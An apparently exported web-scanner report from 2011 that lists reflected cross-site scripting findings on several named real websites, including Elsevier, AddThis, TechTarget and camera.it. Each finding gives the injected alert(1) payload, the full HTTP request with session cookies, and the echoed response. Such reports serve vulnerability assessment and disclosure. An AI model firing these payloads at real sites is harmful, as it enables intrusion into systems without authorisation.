GET /page.asp?655a1"><script>alert(1)</script>a91230d7791=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 02 May 2011 22:20:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 9029 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.8. http://expertsystem.net/vetrinanews.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://expertsystem.net
Path:
/vetrinanews.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f5da"><script>alert(1)</script>e77b82b7423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vetrinanews.asp?1f5da"><script>alert(1)</script>e77b82b7423=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:20:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 14762 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.9. http://finanza-mercati.ilsole24ore.com/quotazioni.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://finanza-mercati.ilsole24ore.com
Path:
/quotazioni.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1267"%3balert(1)//2fb7953fc53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1267";alert(1)//2fb7953fc53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotazioni.php?e1267"%3balert(1)//2fb7953fc53=1 HTTP/1.1 Host: finanza-mercati.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:25:38 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 103141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... antirmi che si ricarica la pagina corrente var inputEl;
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4e760<script>alert(1)</script>c08eaae6482 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:19:01 GMT Server: Apache P3P: policyref="http://adv.alice.it/w3c/p3p.xml", CP=" NOI DSP COR NID", policyref="http://geoisp.alice.it/policy/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT CNT" cache-control: private, must-revalidate, max-age=120 Content-Length: 68 Content-Type: text/html
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload debe2<img%20src%3da%20onerror%3dalert(1)>3afc08da00f was submitted in the REST URL parameter 3. This input was echoed as debe2<img src=a onerror=alert(1)>3afc08da00f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Date: Mon, 02 May 2011 22:46:28 GMT Content-Length: 452
<html> <head><title>404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6461a<img%20src%3da%20onerror%3dalert(1)>ceb055b54ca was submitted in the REST URL parameter 3. This input was echoed as 6461a<img src=a onerror=alert(1)>ceb055b54ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET //clicktrack-r/activity/activity.gif6461a<img%20src%3da%20onerror%3dalert(1)>ceb055b54ca HTTP/1.1 Host: go.techtarget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;
Response
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Connection: close Date: Mon, 02 May 2011 22:25:49 GMT Content-Length: 1327
<html> <head><title>404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.</h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload afbcf<img%20src%3da%20onerror%3dalert(1)>3250be4ac70 was submitted in the REST URL parameter 2. This input was echoed as afbcf<img src=a onerror=alert(1)>3250be4ac70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /activity/activity.gifafbcf<img%20src%3da%20onerror%3dalert(1)>3250be4ac70 HTTP/1.1 Host: go.techtarget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;
Response (redirected)
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Connection: close Date: Mon, 02 May 2011 22:26:01 GMT Content-Length: 1322
<html> <head><title>404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52d48<img%20src%3da%20onerror%3dalert(1)>9a5a459849d was submitted in the REST URL parameter 3. This input was echoed as 52d48<img src=a onerror=alert(1)>9a5a459849d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Date: Mon, 02 May 2011 22:46:32 GMT Content-Length: 1293
<html> <head><title>404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11f14<img%20src%3da%20onerror%3dalert(1)>973664cfb2d was submitted in the REST URL parameter 3. This input was echoed as 11f14<img src=a onerror=alert(1)>973664cfb2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /clicktrack-r/activity/activity.gif11f14<img%20src%3da%20onerror%3dalert(1)>973664cfb2d HTTP/1.1 Host: go.techtarget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;
Response
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Connection: close Date: Mon, 02 May 2011 22:25:50 GMT Content-Length: 1326
<html> <head><title>404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.</h1> ...[SNIP]...
The value of the clicktag request parameter is copied into the HTML document as plain text between tags. The payload 73271<script>alert(1)</script>85f49d12bf0 was submitted in the clicktag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the clicktag request parameter is copied into the HTML document as plain text between tags. The payload 1f911<script>alert(1)</script>751eacaf9bd was submitted in the clicktag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]1f911<script>alert(1)</script>751eacaf9bd&rnd=[RANDOM] HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:05:27 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Pragma: no-cache Cache-Control: no-cache Connection: close Content-Type: application/x-javascript Content-Length: 3514
4.18. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ieo.solution.weborama.fr
Path:
/fcgi-bin/adserv.fcgi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d4392<script>alert(1)</script>33066bb2dad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.19. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ieo.solution.weborama.fr
Path:
/fcgi-bin/adserv.fcgi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2a192<script>alert(1)</script>ef25b6f5bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM]&2a192<script>alert(1)</script>ef25b6f5bf6=1 HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:05:39 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Pragma: no-cache Cache-Control: no-cache Connection: close Content-Type: application/x-javascript Content-Length: 3669
4.20. http://webshop.elsevier.com/forgotpassword.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://webshop.elsevier.com
Path:
/forgotpassword.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd172"><script>alert(1)</script>0b5c9abc8b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forgotpassword.html?bd172"><script>alert(1)</script>0b5c9abc8b8=1 HTTP/1.1 Host: webshop.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=76495853; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; CFID=1230652; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; __utmb=84352454.1.10.1304389900;
Response
HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: Microsoft-IIS/7.0 Date: Mon, 02 May 2011 22:33:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Developed by Ritense webtechnology --> <!-- http://www.ritense.com ...[SNIP]... <form name="forgotPasswordForm" id="forgotPasswordForm" action="/redirect.cfm?404;http://webshop.elsevier.com:80/forgotpassword.html?bd172"><script>alert(1)</script>0b5c9abc8b8=1" method="post" class="logincontainer" onsubmit="return _CF_checkforgotPasswordForm(this)"> ...[SNIP]...
The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 252f0"><script>alert(1)</script>79e7f504dc5 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the d46 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88da4"><script>alert(1)</script>91d57d817b5 was submitted in the d46 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: Microsoft-IIS/7.0 Date: Mon, 02 May 2011 22:51:23 GMT Content-Length: 13277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Developed by Ritense webtechnology --> <!-- http://www.ritense.com ...[SNIP]... <form name="loginForm" id="loginForm" action="/login.cfm?d4688da4"><script>alert(1)</script>91d57d817b5" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)"> ...[SNIP]...
4.23. https://webshop.elsevier.com/login.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://webshop.elsevier.com
Path:
/login.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e2"><script>alert(1)</script>03772b18c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31df3"-alert(1)-"249e5036cfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php31df3"-alert(1)-"249e5036cfd HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 02 May 2011 22:27:42 GMT Server: Apache X-Powered-By: PHP/5.2.16 Set-Cookie: PHPSESSID=m9ica98kbm5dt73tgro89dvv23; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php31df3"-alert(1)-"249e5036cfd"; if (window._gat) { var gaPageTracker = _gat._getTracker("UA-1170033-1"); gaPageTracker._setDomainName("www.addthis.com"); gaPageTracker._setCustomVar(1,"Login","False",2); gaPageTrac ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c22ac<script>alert(1)</script>da40de6267f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.phpc22ac<script>alert(1)</script>da40de6267f HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 02 May 2011 22:27:42 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=na3eafmrfnuoijcvtu7l23t2p7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1378 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.phpc22ac<script>alert(1)</script>da40de6267f</strong> ...[SNIP]...
4.26. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b091"-alert(1)-"92e0eaf77ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/9b091"-alert(1)-"92e0eaf77ed HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:27:28 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96059
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookmarking Sharing Button Widget</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/9b091"-alert(1)-"92e0eaf77ed"; if (window._gat) { var gaPageTracker = _gat._getTracker("UA-1170033-1"); gaPageTracker._setDomainName("www.addthis.com"); gaPageTracker._trackPageview(u); } </script> ...[SNIP]...
4.27. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.camera.it
Path:
/1
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1329'-alert(1)-'a5fb0683740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1?d1329'-alert(1)-'a5fb0683740=1 HTTP/1.1 Host: www.camera.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it"> <!-- view_gr ...[SNIP]... <![CDATA[ var taber = new XmTaber('agenda_lavori', { wi: 295, queryString: 'd1329'-alert(1)-'a5fb0683740=1' });
//]]> ...[SNIP]...
4.28. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.camera.it
Path:
/1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2627"><script>alert(1)</script>124a53125c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1?a2627"><script>alert(1)</script>124a53125c0=1 HTTP/1.1 Host: www.camera.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22997"%3bf38bccab9aa was submitted in the REST URL parameter 3. This input was echoed as 22997";f38bccab9aa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/find/advproductsearch.cws_home22997"%3bf38bccab9aa HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:33 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 24428 Set-Cookie: JSESSIONID=0000Tzc0jT3hhNK1M4Lr4GWcVwL:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78bb0"><img%20src%3da%20onerror%3dalert(1)>67f5c92b011 was submitted in the REST URL parameter 3. This input was echoed as 78bb0"><img src=a onerror=alert(1)>67f5c92b011 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /wps/find/advproductsearch.cws_home78bb0"><img%20src%3da%20onerror%3dalert(1)>67f5c92b011 HTTP/1.1 Host: www.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:31:32 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Content-Length: 24970 Set-Cookie: JSESSIONID=0000-BYReYR8yxhLAjFkChZIJkl:142fmli5a; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 711ec'><img%20src%3da%20onerror%3dalert(1)>485db6800ac was submitted in the REST URL parameter 3. This input was echoed as 711ec'><img src=a onerror=alert(1)>485db6800ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
